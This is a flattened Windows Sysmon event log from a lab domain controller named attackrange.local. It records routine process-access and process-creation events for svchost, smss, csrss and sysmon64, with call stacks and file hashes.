12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-64C1-6064-9000-00000000AE01}40844092C:\Windows\System32\smss.exe{266CAFBE-64C1-6064-9100-00000000AE01}5108C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\SYSTEM32\ntdll.dll+8c58e|C:\Windows\SYSTEM32\ntdll.dll+8c339|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5182f 154100x80000000000000003897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.173{266CAFBE-64C1-6064-9100-00000000AE01}5108C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 
ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e72SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{266CAFBE-64C1-6064-9000-00000000AE01}4084C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 00000110 0000007c 10341000x80000000000000003896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-6467-6064-0200-00000000AE01}4321028C:\Windows\System32\smss.exe{266CAFBE-64C1-6064-9000-00000000AE01}4084C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6c14|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.162{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.162{266CAFBE-6467-6064-0200-00000000AE01}4321028C:\Windows\System32\smss.exe{266CAFBE-64C1-6064-9000-00000000AE01}4084C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\SYSTEM32\ntdll.dll+8c58e|C:\Windows\SYSTEM32\ntdll.dll+8c339|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+3c31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5182f 154100x80000000000000003885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.166{266CAFBE-64C1-6064-9000-00000000AE01}4084C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 00000110 0000007c C:\Windows\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e72SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{266CAFBE-6467-6064-0200-00000000AE01}432C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 10341000x80000000000000003884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.147{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64C1-6064-8F00-00000000AE01}3960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.147{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.147{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.147{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.147{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.147{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.147{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.147{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:09.147{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.147{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.147{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64C1-6064-8F00-00000000AE01}3960C:\Program 
